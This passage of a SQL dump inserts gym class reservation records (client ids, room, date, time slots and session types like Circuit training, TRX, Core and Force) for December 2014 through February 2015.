(3021, 133, 'CTR', '2014-12-08', '19h00', '19h30', 'Circuit training'),
(3022, 92, 'CTR', '2014-12-09', '19h45', '20h15', 'Circuit training'),
(3023, 138, 'CTR', '2014-12-09', '19h45', '20h15', 'Circuit training'),
(3025, 34, 'CTR', '2014-12-10', '17h30', '18h', 'Circuit training'),
(3026, 41, 'CTR', '2014-12-11', '18h15', '18h45', 'Circuit training'),
(3027, 29, 'CTR', '2014-12-09', '17h30', '18h00', 'Circuit training'),
(3028, 29, 'CTR', '2014-12-11', '17h30', '18h00', 'Core'),
(3029, 103, 'CTR', '2014-12-08', '19h00', '19h30', 'Circuit training'),
(3030, 147, 'CTR', '2014-12-08', '17h30', '18h00', 'Circuit training'),
(3031, 44, 'CTR', '2014-12-08', '17h30', '18h00', 'Circuit training'),
(3032, 26, 'CTR', '2014-12-08', '19h00', '19h30', 'Circuit training'),
(3033, 40, 'CTR', '2014-12-08', '17h30', '18h00', 'Circuit training'),
(3034, 41, 'CTR', '2014-12-08', '17h30', '18h00', 'Circuit training'),
(3035, 48, 'CTR', '2014-12-09', '19h45', '20h15', 'Circuit training'),
(3036, 54, 'CTR', '2014-12-10', '18h15', '18h45', 'Force'),
(3037, 102, 'CTR', '2014-12-09', '19h45', '20h15', 'Circuit training'),
(3038, 80, 'CTR', '2014-12-10', '17h30', '18h', 'Circuit training'),
(3040, 41, 'CTR', '2014-12-16', '19h00', '19h30', 'TRX'),
(3041, 41, 'CTR', '2014-12-17', '19h ', '19h30', 'Circuit training'),
(3042, 41, 'CTR', '2014-12-23', '19h00', '19h30', 'TRX'),
(3043, 41, 'CTR', '2014-12-22', '17h30', '18h00', 'Circuit training'),
(3045, 14, 'CTR', '2014-12-09', '19h00', '19h30', 'TRX'),
(3046, 40, 'CTR', '2014-12-09', '19h00', '19h30', 'TRX'),
(3047, 40, 'CTR', '2014-12-10', '18h15', '18h45', 'Force'),
(3048, 44, 'CTR', '2014-12-10', '17h30', '18h', 'Circuit training'),
(3049, 80, 'CTR', '2014-12-10', '19h ', '19h30', 'Circuit training'),
(3050, 101, 'CTR', '2014-12-10', '17h30', '18h', 'Circuit training'),
(3051, 103, 'CTR', '2014-12-10', '18h15', '18h45', 'Force'),
(3052, 26, 'CTR', '2014-12-10', '18h15', '18h45', 'Force'),
(3053, 139, 'CTR', '2014-12-10', '17h30', '18h', 'Circuit training'),
(3054, 41, 'CTR', '2014-12-29', '17h30', '18h00', 'Circuit training'),
(3055, 41, 'CTR', '2014-12-30', '19h00', '19h30', 'TRX'),
(3064, 97, 'CTR', '2014-12-17', '17h30', '18h', 'Circuit training'),
(3057, 143, 'CTR', '2014-12-11', '18h15', '18h45', 'Circuit training'),
(3058, 143, 'CTR', '2014-12-15', '19h00', '19h30', 'Circuit training'),
(3101, 40, 'CTR', '2014-12-18', '17h30', '18h00', 'Core'),
(3060, 54, 'CTR', '2014-12-17', '18h15', '18h45', 'Force'),
(3061, 44, 'CTR', '2014-12-11', '17h30', '18h00', 'Core'),
(3062, 32, 'CTR', '2014-12-11', '17h30', '18h00', 'Core'),
(3065, 149, 'CTR', '2014-12-17', '17h30', '18h', 'Circuit training'),
(3066, 149, 'CTR', '2014-12-19', '18h15', '18h45', 'Circuit training'),
(3067, 140, 'CTR', '2014-12-15', '17h30', '18h00', 'Circuit training'),
(3068, 44, 'CTR', '2014-12-15', '17h30', '18h00', 'Circuit training'),
(3069, 93, 'CTR', '2014-12-15', '19h00', '19h30', 'Circuit training'),
(3070, 133, 'CTR', '2014-12-15', '19h00', '19h30', 'Circuit training'),
(3071, 48, 'CTR', '2014-12-15', '19h00', '19h30', 'Circuit training'),
(3072, 14, 'CTR', '2014-12-15', '17h30', '18h00', 'Circuit training'),
(3073, 32, 'CTR', '2014-12-15', '19h00', '19h30', 'Circuit training'),
(3074, 56, 'CTR', '2014-12-15', '17h30', '18h00', 'Circuit training'),
(3075, 52, 'CTR', '2014-12-15', '19h00', '19h30', 'Circuit training'),
(3076, 34, 'CTR', '2014-12-15', '17h30', '18h00', 'Circuit training'),
(3077, 147, 'CTR', '2014-12-15', '17h30', '18h00', 'Circuit training'),
(3078, 128, 'CTR', '2014-12-15', '17h30', '18h00', 'Circuit training'),
(3079, 56, 'CTR', '2014-12-17', '17h30', '18h', 'Circuit training'),
(3080, 48, 'CTR', '2014-12-16', '19h45', '20h15', 'Circuit training'),
(3081, 138, 'CTR', '2014-12-16', '19h45', '20h15', 'Circuit training'),
(3090, 92, 'CTR', '2014-12-16', '19h45', '20h15', 'Circuit training'),
(3083, 27, 'CTR', '2014-12-16', '19h45', '20h15', 'Circuit training'),
(3084, 103, 'CTR', '2014-12-16', '19h00', '19h30', 'TRX'),
(3085, 119, 'CTR', '2014-12-16', '19h00', '19h30', 'TRX'),
(3086, 147, 'CTR', '2014-12-16', '19h45', '20h15', 'Circuit training'),
(3087, 102, 'CTR', '2014-12-16', '19h45', '20h15', 'Circuit training'),
(3088, 14, 'CTR', '2014-12-16', '19h00', '19h30', 'TRX'),
(3089, 31, 'CTR', '2014-12-16', '19h45', '20h15', 'Circuit training'),
(3091, 37, 'CTR', '2014-12-16', '19h00', '19h30', 'TRX'),
(3092, 40, 'CTR', '2014-12-17', '18h15', '18h45', 'Force'),
(3093, 31, 'CTR', '2014-12-19', '18h15', '18h45', 'Circuit training'),
(3100, 149, 'CTR', '2014-12-22', '17h30', '18h00', 'Circuit training'),
(3095, 80, 'CTR', '2014-12-17', '19h ', '19h30', 'Circuit training'),
(3096, 80, 'CTR', '2014-12-17', '19h ', '19h30', 'Circuit training'),
(3097, 38, 'CTR', '2014-12-17', '19h ', '19h30', 'Circuit training'),
(3098, 34, 'CTR', '2014-12-17', '17h30', '18h', 'Circuit training'),
(3099, 13, 'CTR', '2014-12-17', '17h30', '18h', 'Circuit training'),
(3102, 101, 'CTR', '2014-12-18', '17h30', '18h00', 'Core'),
(3103, 44, 'CTR', '2014-12-18', '17h30', '18h00', 'Core'),
(3104, 143, 'CTR', '2014-12-18', '17h30', '18h00', 'Core'),
(3112, 39, 'CTR', '2014-12-23', '19h00', '19h30', 'TRX'),
(3106, 126, 'CTR', '2014-12-19', '17h30', '18h00', 'TRX'),
(3190, 97, 'CTR', '2015-01-07', '17h30', '18h', 'Circuit training'),
(3108, 41, 'CTR', '2015-01-07', '19h ', '19h30', 'Circuit training'),
(3109, 41, 'CTR', '2015-01-08', '18h15', '18h45', 'Circuit training'),
(3110, 40, 'CTR', '2014-12-22', '17h30', '18h00', 'Circuit training'),
(3111, 40, 'CTR', '2014-12-23', '19h00', '19h30', 'TRX'),
(3114, 134, 'CTR', '2014-12-23', '19h00', '19h30', 'TRX'),
(3115, 101, 'CTR', '2014-12-19', '17h30', '18h00', 'TRX'),
(3116, 44, 'CTR', '2014-12-19', '17h30', '18h00', 'TRX'),
(3117, 149, 'CTR', '2014-12-23', '17h30', '18h00', 'Circuit training'),
(3118, 138, 'CTR', '2014-12-22', '19h00', '19h30', 'Circuit training'),
(3119, 150, 'CTR', '2014-12-22', '17h30', '18h00', 'Circuit training'),
(3120, 150, 'CTR', '2014-12-23', '17h30', '18h00', 'Circuit training'),
(3121, 143, 'CTR', '2014-12-22', '19h00', '19h30', 'Circuit training'),
(3122, 140, 'CTR', '2014-12-22', '17h30', '18h00', 'Circuit training'),
(3170, 113, 'CTR', '2014-12-30', '19h45', '20h15', 'Circuit training'),
(3124, 40, 'CTR', '2014-12-29', '17h30', '18h00', 'Circuit training'),
(3125, 40, 'CTR', '2014-12-30', '19h00', '19h30', 'TRX'),
(3126, 31, 'CTR', '2014-12-23', '19h45', '20h15', 'Circuit training'),
(3127, 48, 'CTR', '2014-12-22', '19h00', '19h30', 'Circuit training'),
(3128, 14, 'CTR', '2014-12-22', '17h30', '18h00', 'Circuit training'),
(3129, 128, 'CTR', '2014-12-22', '17h30', '18h00', 'Circuit training'),
(3130, 148, 'CTR', '2014-12-22', '19h00', '19h30', 'Circuit training'),
(3132, 93, 'CTR', '2014-12-22', '19h00', '19h30', 'Circuit training'),
(3133, 97, 'CTR', '2014-12-23', '17h30', '18h00', 'Circuit training'),
(3134, 27, 'CTR', '2014-12-22', '19h00', '19h30', 'Circuit training'),
(3135, 13, 'CTR', '2014-12-22', '17h30', '18h00', 'Circuit training'),
(3136, 34, 'CTR', '2014-12-22', '19h00', '19h30', 'Circuit training'),
(3137, 141, 'CTR', '2014-12-23', '18h15', '18h45', 'Circuit training'),
(3138, 48, 'CTR', '2014-12-23', '19h45', '20h15', 'Circuit training'),
(3139, 44, 'CTR', '2014-12-23', '18h15', '18h45', 'Circuit training'),
(3140, 37, 'CTR', '2014-12-23', '17h30', '18h00', 'Circuit training'),
(3141, 14, 'CTR', '2014-12-23', '19h00', '19h30', 'TRX'),
(3142, 148, 'CTR', '2014-12-23', '19h45', '20h15', 'Circuit training'),
(3143, 103, 'CTR', '2014-12-23', '19h00', '19h30', 'TRX'),
(3144, 38, 'CTR', '2014-12-23', '18h15', '18h45', 'Circuit training'),
(3145, 149, 'CTR', '2014-12-29', '17h30', '18h00', 'Circuit training'),
(3146, 151, 'CTR', '2014-12-29', '17h30', '18h00', 'Circuit training'),
(3147, 147, 'CTR', '2014-12-23', '19h00', '19h30', 'TRX'),
(3148, 48, 'CTR', '2014-12-29', '19h00', '19h30', 'Circuit training'),
(3149, 31, 'CTR', '2014-12-30', '19h45', '20h15', 'Circuit training'),
(3150, 48, 'CTR', '2014-12-30', '19h45', '20h15', 'Circuit training'),
(3151, 148, 'CTR', '2014-12-29', '19h00', '19h30', 'Circuit training'),
(3152, 148, 'CTR', '2014-12-30', '19h45', '20h15', 'Circuit training'),
(3153, 132, 'CTR', '2014-12-29', '17h30', '18h00', 'Circuit training'),
(3154, 34, 'CTR', '2014-12-29', '17h30', '18h00', 'Circuit training'),
(3155, 150, 'CTR', '2014-12-29', '19h00', '19h30', 'Circuit training'),
(3156, 150, 'CTR', '2014-12-30', '19h45', '20h15', 'Circuit training'),
(3157, 138, 'CTR', '2014-12-29', '19h00', '19h30', 'Circuit training'),
(3158, 134, 'CTR', '2014-12-30', '19h00', '19h30', 'TRX'),
(3159, 39, 'CTR', '2014-12-30', '19h00', '19h30', 'TRX'),
(3160, 80, 'CTR', '2014-12-30', '19h00', '19h30', 'TRX'),
(3169, 26, 'CTR', '2014-12-30', '19h45', '20h15', 'Circuit training'),
(3162, 141, 'CTR', '2014-12-29', '17h30', '18h00', 'Circuit training'),
(3163, 103, 'CTR', '2014-12-29', '19h00', '19h30', 'Circuit training'),
(3164, 93, 'CTR', '2014-12-29', '19h00', '19h30', 'Circuit training'),
(3165, 133, 'CTR', '2014-12-29', '19h00', '19h30', 'Circuit training'),
(3166, 26, 'CTR', '2014-12-29', '19h00', '19h30', 'Circuit training'),
(3168, 32, 'CTR', '2014-12-30', '19h00', '19h30', 'TRX'),
(3171, 31, 'CTR', '2015-01-06', '19h45', '20h15', 'Circuit training'),
(3172, 141, 'CTR', '2014-12-30', '19h45', '20h15', 'Circuit training'),
(3173, 148, 'CTR', '2015-01-08', '17h30', '18h00', 'Core'),
(3174, 148, 'CTR', '2015-01-06', '19h00', '19h30', 'TRX'),
(3175, 140, 'CTR', '2015-01-05', '17h30', '18h00', 'Circuit training'),
(3176, 138, 'CTR', '2015-01-05', '19h00', '19h30', 'Circuit training'),
(3177, 48, 'CTR', '2015-01-05', '19h00', '19h30', 'Circuit training'),
(3178, 48, 'CTR', '2015-01-06', '19h45', '20h15', 'Circuit training'),
(3179, 44, 'CTR', '2015-01-05', '17h30', '18h00', 'Circuit training'),
(3180, 44, 'CTR', '2015-01-08', '17h30', '18h00', 'Core'),
(3181, 65, 'CTR', '2015-01-05', '17h30', '18h00', 'Circuit training'),
(3182, 93, 'CTR', '2015-01-05', '19h00', '19h30', 'Circuit training'),
(3184, 34, 'CTR', '2015-01-05', '17h30', '18h00', 'Circuit training'),
(3185, 14, 'CTR', '2015-01-05', '17h30', '18h00', 'Circuit training'),
(3208, 48, 'CTR', '2015-01-09', '18h15', '18h45', 'Circuit training'),
(3187, 32, 'CTR', '2015-01-05', '19h00', '19h30', 'Circuit training'),
(3211, 152, 'CTR', '2015-01-16', '17h30', '18h00', 'TRX'),
(3189, 141, 'CTR', '2015-01-09', '17h30', '18h00', 'TRX'),
(3191, 34, 'CTR', '2015-01-07', '17h30', '18h', 'Circuit training'),
(3192, 54, 'CTR', '2015-01-07', '18h15', '18h45', 'Force'),
(3193, 53, 'CTR', '2015-01-07', '18h15', '18h45', 'Force'),
(3194, 47, 'CTR', '2015-01-09', '17h30', '18h00', 'TRX'),
(3195, 40, 'CTR', '2015-01-07', '18h15', '18h45', 'Force'),
(3196, 26, 'CTR', '2015-01-07', '19h ', '19h30', 'Circuit training'),
(3197, 139, 'CTR', '2015-01-07', '17h30', '18h', 'Circuit training');
INSERT INTO `reservation_reservation_bck` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(3198, 136, 'CTR', '2015-01-09', '18h15', '18h45', 'Circuit training'),
(3199, 44, 'CTR', '2015-01-07', '17h30', '18h', 'Circuit training'),
(3200, 53, 'CTR', '2015-01-09', '17h30', '18h00', 'TRX'),
(3201, 93, 'CTR', '2015-01-08', '18h15', '18h45', 'Circuit training'),
(3202, 29, 'CTR', '2015-01-08', '17h30', '18h00', 'Core'),
(3203, 32, 'CTR', '2015-01-08', '18h15', '18h45', 'Circuit training'),
(3204, 149, 'CTR', '2015-01-13', '18h15', '18h45', 'Circuit training'),
(3205, 53, 'CTR', '2015-01-14', '18h15', '18h45', 'Force'),
(3206, 80, 'CTR', '2015-01-09', '17h30', '18h00', 'TRX'),
(3207, 50, 'CTR', '2015-01-09', '17h30', '18h00', 'TRX'),
(3209, 63, 'CTR', '2015-01-09', '17h30', '18h00', 'TRX'),
(3210, 69, 'CTR', '2015-01-09', '17h30', '18h00', 'TRX'),
(3212, 53, 'CTR', '2015-01-16', '17h30', '18h00', 'TRX'),
(3213, 29, 'CTR', '2015-01-13', '17h30', '18h00', 'Circuit training'),
(3214, 41, 'CTR', '2015-01-13', '19h00', '19h30', 'TRX'),
(3215, 41, 'CTR', '2015-01-14', '19h ', '19h30', 'Circuit training'),
(3252, 41, 'CTR', '2015-02-03', '19h00', '19h30', 'TRX'),
(3285, 134, 'CTR', '2015-01-20', '19h00', '19h30', 'TRX'),
(3294, 148, 'CTR', '2015-01-21', '17h30', '18h', 'Circuit training'),
(3295, 19, 'CTR', '2015-01-21', '17h30', '18h', 'Circuit training'),
(3220, 41, 'CTR', '2015-01-27', '19h00', '19h30', 'TRX'),
(3221, 41, 'CTR', '2015-01-28', '19h ', '19h30', 'Circuit training'),
(3222, 41, 'CTR', '2015-01-29', '18h15', '18h45', 'Circuit training'),
(3223, 65, 'CTR', '2015-01-13', '17h30', '18h00', 'Circuit training'),
(3224, 140, 'CTR', '2015-01-13', '17h30', '18h00', 'Circuit training'),
(3231, 92, 'CTR', '2015-01-13', '19h45', '20h15', 'Circuit training'),
(3226, 148, 'CTR', '2015-01-16', '18h15', '18h45', 'Circuit training'),
(3227, 48, 'CTR', '2015-01-13', '19h45', '20h15', 'Circuit training'),
(3228, 48, 'CTR', '2015-01-14', '19h ', '19h30', 'Circuit training'),
(3229, 138, 'CTR', '2015-01-13', '19h45', '20h15', 'Circuit training'),
(3230, 148, 'CTR', '2015-01-14', '19h ', '19h30', 'Circuit training'),
(3232, 31, 'CTR', '2015-01-13', '19h45', '20h15', 'Circuit training'),
(3233, 37, 'CTR', '2015-01-13', '18h15', '18h45', 'Circuit training'),
(3234, 134, 'CTR', '2015-01-13', '19h00', '19h30', 'TRX'),
(3235, 102, 'CTR', '2015-01-13', '19h45', '20h15', 'Circuit training'),
(3236, 136, 'CTR', '2015-01-14', '17h30', '18h', 'Circuit training'),
(3237, 14, 'CTR', '2015-01-13', '19h00', '19h30', 'TRX'),
(3238, 14, 'CTR', '2015-01-13', '18h15', '18h45', 'Circuit training'),
(3239, 97, 'CTR', '2015-01-14', '17h30', '18h', 'Circuit training'),
(3240, 40, 'CTR', '2015-01-14', '18h15', '18h45', 'Force'),
(3241, 37, 'CTR', '2015-01-14', '18h15', '18h45', 'Force'),
(3242, 139, 'CTR', '2015-01-14', '17h30', '18h', 'Circuit training'),
(3243, 28, 'CTR', '2015-01-15', '17h30', '18h00', 'Core'),
(3244, 51, 'CTR', '2015-01-15', '17h30', '18h00', 'Core'),
(3245, 29, 'CTR', '2015-01-15', '17h30', '18h00', 'Core'),
(3246, 26, 'CTR', '2015-01-14', '18h15', '18h45', 'Force'),
(3247, 104, 'CTR', '2015-01-14', '18h15', '18h45', 'Force'),
(3248, 103, 'CTR', '2015-01-14', '18h15', '18h45', 'Force'),
(3249, 13, 'CTR', '2015-01-14', '17h30', '18h', 'Circuit training'),
(3250, 44, 'CTR', '2015-01-14', '17h30', '18h', 'Circuit training'),
(3251, 44, 'CTR', '2015-01-15', '17h30', '18h00', 'Core'),
(3253, 41, 'CTR', '2015-02-04', '19h ', '19h30', 'Circuit training'),
(3254, 93, 'CTR', '2015-01-15', '18h15', '18h45', 'Circuit training'),
(3255, 133, 'CTR', '2015-01-15', '18h15', '18h45', 'Circuit training'),
(3256, 31, 'CTR', '2015-01-16', '18h15', '18h45', 'Circuit training'),
(3257, 48, 'CTR', '2015-01-16', '18h15', '18h45', 'Circuit training'),
(3258, 47, 'CTR', '2015-01-16', '17h30', '18h00', 'TRX'),
(3259, 63, 'CTR', '2015-01-16', '17h30', '18h00', 'TRX'),
(3260, 44, 'CTR', '2015-01-16', '18h15', '18h45', 'Circuit training'),
(3261, 65, 'CTR', '2015-01-20', '17h30', '18h00', 'Circuit training'),
(3286, 148, 'CTR', '2015-01-20', '19h45', '20h15', 'Circuit training'),
(3263, 148, 'CTR', '2015-01-22', '18h15', '18h45', 'Circuit training'),
(3279, 69, 'CTR', '2015-01-21', '18h15', '18h45', 'Force'),
(3265, 140, 'CTR', '2015-01-19', '17h30', '18h00', 'Circuit training'),
(3266, 48, 'CTR', '2015-01-19', '19h00', '19h30', 'Circuit training'),
(3267, 93, 'CTR', '2015-01-19', '19h00', '19h30', 'Circuit training'),
(3268, 133, 'CTR', '2015-01-19', '19h00', '19h30', 'Circuit training'),
(3269, 143, 'CTR', '2015-01-19', '19h00', '19h30', 'Circuit training'),
(3270, 44, 'CTR', '2015-01-19', '17h30', '18h00', 'Circuit training'),
(3271, 44, 'CTR', '2015-01-22', '17h30', '18h00', 'Core'),
(3272, 143, 'CTR', '2015-01-19', '17h30', '18h00', 'Circuit training'),
(3273, 56, 'CTR', '2015-01-19', '17h30', '18h00', 'Circuit training'),
(3274, 14, 'CTR', '2015-01-19', '17h30', '18h00', 'Circuit training'),
(3275, 56, 'CTR', '2015-01-21', '17h30', '18h', 'Circuit training'),
(3276, 32, 'CTR', '2015-01-19', '19h00', '19h30', 'Circuit training'),
(3277, 31, 'CTR', '2015-01-20', '19h45', '20h15', 'Circuit training'),
(3278, 31, 'CTR', '2015-01-23', '18h15', '18h45', 'Circuit training'),
(3280, 53, 'CTR', '2015-01-21', '18h15', '18h45', 'Force'),
(3281, 69, 'CTR', '2015-01-23', '17h30', '18h00', 'TRX'),
(3306, 134, 'CTR', '2015-01-26', '17h30', '18h00', 'Circuit training'),
(3283, 48, 'CTR', '2015-01-20', '19h45', '20h15', 'Circuit training'),
(3284, 138, 'CTR', '2015-01-20', '19h45', '20h15', 'Circuit training'),
(3287, 29, 'CTR', '2015-01-20', '17h30', '18h00', 'Circuit training'),
(3288, 149, 'CTR', '2015-01-20', '17h30', '18h00', 'Circuit training'),
(3289, 102, 'CTR', '2015-01-20', '19h45', '20h15', 'Circuit training'),
(3290, 136, 'CTR', '2015-01-21', '17h30', '18h', 'Circuit training'),
(3291, 41, 'CTR', '2015-02-05', '18h15', '18h45', 'Circuit training'),
(3413, 136, 'CTR', '2015-02-12', '17h30', '18h00', 'Core'),
(3296, 139, 'CTR', '2015-01-21', '17h30', '18h', 'Circuit training'),
(3297, 26, 'CTR', '2015-01-21', '18h15', '18h45', 'Force'),
(3298, 130, 'CTR', '2015-01-21', '18h15', '18h45', 'Force'),
(3299, 93, 'CTR', '2015-01-22', '18h15', '18h45', 'Circuit training'),
(3300, 133, 'CTR', '2015-01-22', '18h15', '18h45', 'Circuit training'),
(3301, 50, 'CTR', '2015-01-23', '17h30', '18h00', 'TRX'),
(3302, 63, 'CTR', '2015-01-23', '17h30', '18h00', 'TRX'),
(3303, 32, 'CTR', '2015-01-23', '17h30', '18h00', 'TRX'),
(3304, 34, 'CTR', '2015-01-23', '18h15', '18h45', 'Circuit training'),
(3305, 1, 'CTR', '2015-01-23', '18h15', '18h45', 'Circuit training'),
(3307, 37, 'CTR', '2015-01-26', '17h30', '18h00', 'Circuit training'),
(3308, 48, 'CTR', '2015-01-26', '19h00', '19h30', 'Circuit training'),
(3309, 31, 'CTR', '2015-01-27', '19h45', '20h15', 'Circuit training'),
(3310, 93, 'CTR', '2015-01-26', '19h00', '19h30', 'Circuit training'),
(3311, 143, 'CTR', '2015-01-26', '17h30', '18h00', 'Circuit training'),
(3312, 26, 'CTR', '2015-01-26', '19h00', '19h30', 'Circuit training'),
(3313, 130, 'CTR', '2015-01-26', '19h00', '19h30', 'Circuit training'),
(3314, 34, 'CTR', '2015-01-26', '17h30', '18h00', 'Circuit training'),
(3315, 14, 'CTR', '2015-01-26', '17h30', '18h00', 'Circuit training'),
(3316, 48, 'CTR', '2015-01-27', '19h45', '20h15', 'Circuit training'),
(3317, 37, 'CTR', '2015-01-27', '17h30', '18h00', 'Circuit training'),
(3318, 32, 'CTR', '2015-01-26', '19h00', '19h30', 'Circuit training'),
(3319, 65, 'CTR', '2015-01-27', '17h30', '18h00', 'Circuit training'),
(3320, 29, 'CTR', '2015-01-27', '17h30', '18h00', 'Circuit training'),
(3321, 19, 'CTR', '2015-01-27', '17h30', '18h00', 'Circuit training'),
(3322, 40, 'CTR', '2015-01-27', '19h00', '19h30', 'TRX'),
(3323, 40, 'CTR', '2015-01-28', '18h15', '18h45', 'Force'),
(3324, 40, 'CTR', '2015-01-29', '17h30', '18h00', 'Core'),
(3325, 148, 'CTR', '2015-01-27', '17h30', '18h00', 'Circuit training'),
(3354, 48, 'CTR', '2015-01-30', '17h30', '18h00', 'TRX'),
(3327, 92, 'CTR', '2015-01-27', '19h45', '20h15', 'Circuit training'),
(3328, 38, 'CTR', '2015-01-27', '19h00', '19h30', 'TRX'),
(3329, 136, 'CTR', '2015-01-28', '17h30', '18h', 'Circuit training'),
(3330, 41, 'CTR', '2015-02-11', '19h ', '19h30', 'Circuit training'),
(3331, 41, 'CTR', '2015-02-12', '18h15', '18h45', 'Circuit training'),
(3332, 41, 'CTR', '2015-02-17', '19h00', '19h30', 'TRX'),
(3333, 39, 'CTR', '2015-01-27', '19h00', '19h30', 'TRX'),
(3334, 14, 'CTR', '2015-01-27', '19h00', '19h30', 'TRX'),
(3350, 47, 'CTR', '2015-01-30', '17h30', '18h00', 'TRX'),
(3336, 56, 'CTR', '2015-01-30', '17h30', '18h00', 'TRX'),
(3337, 63, 'CTR', '2015-01-28', '17h30', '18h', 'Circuit training'),
(3338, 26, 'CTR', '2015-01-28', '18h15', '18h45', 'Force'),
(3339, 97, 'CTR', '2015-01-28', '17h30', '18h', 'Circuit training'),
(3340, 34, 'CTR', '2015-01-28', '17h30', '18h', 'Circuit training'),
(3341, 140, 'CTR', '2015-02-02', '17h30', '18h00', 'Circuit training'),
(3342, 130, 'CTR', '2015-01-28', '18h15', '18h45', 'Force'),
(3343, 93, 'CTR', '2015-01-29', '18h15', '18h45', 'Circuit training'),
(3344, 53, 'CTR', '2015-01-30', '17h30', '18h00', 'TRX'),
(3345, 133, 'CTR', '2015-01-29', '18h15', '18h45', 'Circuit training'),
(3346, 134, 'CTR', '2015-01-29', '17h30', '18h00', 'Core'),
(3347, 41, 'CTR', '2015-02-18', '19h ', '19h30', 'Circuit training'),
(3348, 41, 'CTR', '2015-02-19', '18h15', '18h45', 'Circuit training'),
(3349, 50, 'CTR', '2015-01-30', '17h30', '18h00', 'TRX'),
(3357, 31, 'CTR', '2015-01-30', '17h30', '18h00', 'TRX'),
(3356, 148, 'CTR', '2015-01-30', '17h30', '18h00', 'TRX'),
(3353, 31, 'CTR', '2015-02-03', '19h45', '20h15', 'Circuit training'),
(3358, 149, 'CTR', '2015-02-03', '17h30', '18h00', 'Circuit training'),
(3359, 151, 'CTR', '2015-02-02', '19h00', '19h30', 'Circuit training'),
(3373, 34, 'CTR', '2015-02-02', '17h30', '18h00', 'Circuit training'),
(3362, 93, 'CTR', '2015-02-02', '19h00', '19h30', 'Circuit training'),
(3363, 133, 'CTR', '2015-02-02', '19h00', '19h30', 'Circuit training'),
(3364, 65, 'CTR', '2015-02-04', '17h30', '18h', 'Circuit training'),
(3365, 48, 'CTR', '2015-02-02', '19h00', '19h30', 'Circuit training'),
(3366, 44, 'CTR', '2015-02-02', '17h30', '18h00', 'Circuit training'),
(3395, 44, 'CTR', '2015-02-05', '18h15', '18h45', 'Circuit training'),
(3368, 143, 'CTR', '2015-02-02', '17h30', '18h00', 'Circuit training'),
(3369, 14, 'CTR', '2015-02-02', '17h30', '18h00', 'Circuit training'),
(3370, 56, 'CTR', '2015-02-04', '17h30', '18h', 'Circuit training'),
(3372, 148, 'CTR', '2015-02-02', '17h30', '18h00', 'Circuit training'),
(3374, 32, 'CTR', '2015-02-02', '19h00', '19h30', 'Circuit training'),
(3375, 48, 'CTR', '2015-02-03', '19h45', '20h15', 'Circuit training'),
(3376, 40, 'CTR', '2015-02-03', '19h00', '19h30', 'TRX'),
(3385, 149, 'CTR', '2015-02-04', '17h30', '18h', 'Circuit training'),
(3380, 19, 'CTR', '2015-02-03', '17h30', '18h00', 'Circuit training'),
(3381, 14, 'CTR', '2015-02-03', '19h00', '19h30', 'TRX'),
(3382, 32, 'CTR', '2015-02-03', '17h30', '18h00', 'Circuit training'),
(3383, 26, 'CTR', '2015-02-03', '19h45', '20h15', 'Circuit training'),
(3384, 97, 'CTR', '2015-02-04', '17h30', '18h', 'Circuit training'),
(3386, 148, 'CTR', '2015-02-04', '17h30', '18h', 'Circuit training'),
(3387, 32, 'CTR', '2015-02-04', '17h30', '18h', 'Circuit training'),
(3388, 53, 'CTR', '2015-02-04', '18h15', '18h45', 'Force'),
(3389, 52, 'CTR', '2015-02-04', '17h30', '18h', 'Circuit training'),
(3390, 40, 'CTR', '2015-02-04', '18h15', '18h45', 'Force'),
(3391, 41, 'CTR', '2015-02-24', '19h00', '19h30', 'TRX'),
(3392, 41, 'CTR', '2015-02-25', '19h ', '19h30', 'Circuit training'),
(3393, 93, 'CTR', '2015-02-05', '18h15', '18h45', 'Circuit training'),
(3394, 133, 'CTR', '2015-02-05', '18h15', '18h45', 'Circuit training'),
(3396, 47, 'CTR', '2015-02-06', '17h30', '18h00', 'TRX'),
(3397, 31, 'CTR', '2015-02-06', '18h15', '18h45', 'Circuit training'),
(3399, 93, 'CTR', '2015-02-09', '19h00', '19h30', 'Circuit training'),
(3400, 48, 'CTR', '2015-02-09', '19h00', '19h30', 'Circuit training'),
(3401, 133, 'CTR', '2015-02-09', '19h00', '19h30', 'Circuit training'),
(3402, 56, 'CTR', '2015-02-09', '17h30', '18h00', 'Circuit training'),
(3403, 44, 'CTR', '2015-02-09', '17h30', '18h00', 'Circuit training'),
(3418, 44, 'CTR', '2015-02-11', '17h30', '18h', 'Circuit training'),
(3405, 14, 'CTR', '2015-02-09', '17h30', '18h00', 'Circuit training'),
(3406, 32, 'CTR', '2015-02-09', '19h00', '19h30', 'Circuit training'),
(3407, 130, 'CTR', '2015-02-09', '19h00', '19h30', 'Circuit training'),
(3408, 41, 'CTR', '2015-02-26', '18h15', '18h45', 'Circuit training'),
(3409, 52, 'CTR', '2015-02-09', '19h00', '19h30', 'Circuit training'),
(3410, 65, 'CTR', '2015-02-10', '17h30', '18h00', 'Circuit training'),
(3411, 48, 'CTR', '2015-02-10', '19h45', '20h15', 'Circuit training'),
(3412, 31, 'CTR', '2015-02-10', '19h45', '20h15', 'Circuit training'),
(3414, 80, 'CTR', '2015-02-12', '17h30', '18h00', 'Core'),
(3415, 148, 'CTR', '2015-02-10', '17h30', '18h00', 'Circuit training'),
(3416, 32, 'CTR', '2015-02-10', '19h00', '19h30', 'TRX'),
(3419, 44, 'CTR', '2015-02-12', '18h15', '18h45', 'Circuit training'),
(3420, 121, 'CTR', '2015-02-12', '18h15', '18h45', 'Circuit training'),
(3421, 151, 'CTR', '2015-02-11', '17h30', '18h', 'Circuit training'),
(3422, 97, 'CTR', '2015-02-11', '19h ', '19h30', 'Circuit training'),
(3423, 34, 'CTR', '2015-02-11', '17h30', '18h', 'Circuit training'),
(3424, 148, 'CTR', '2015-02-12', '17h30', '18h00', 'Core'),
(3425, 80, 'CTR', '2015-02-12', '17h30', '18h00', 'Core'),
(3431, 93, 'CTR', '2015-02-16', '19h00', '19h30', 'Circuit training'),
(3427, 29, 'CTR', '2015-02-12', '17h30', '18h00', 'Core'),
(3430, 48, 'CTR', '2015-02-16', '19h00', '19h30', 'Circuit training'),
(3432, 133, 'CTR', '2015-02-16', '19h00', '19h30', 'Circuit training'),
(3433, 32, 'CTR', '2015-02-16', '19h00', '19h30', 'Circuit training'),
(3434, 130, 'CTR', '2015-02-16', '19h00', '19h30', 'Circuit training'),
(3435, 145, 'CTR', '2015-02-16', '19h00', '19h30', 'Circuit training'),
(3436, 48, 'CTR', '2015-02-17', '19h45', '20h15', 'Circuit training'),
(3437, 31, 'CTR', '2015-02-17', '19h45', '20h15', 'Circuit training'),
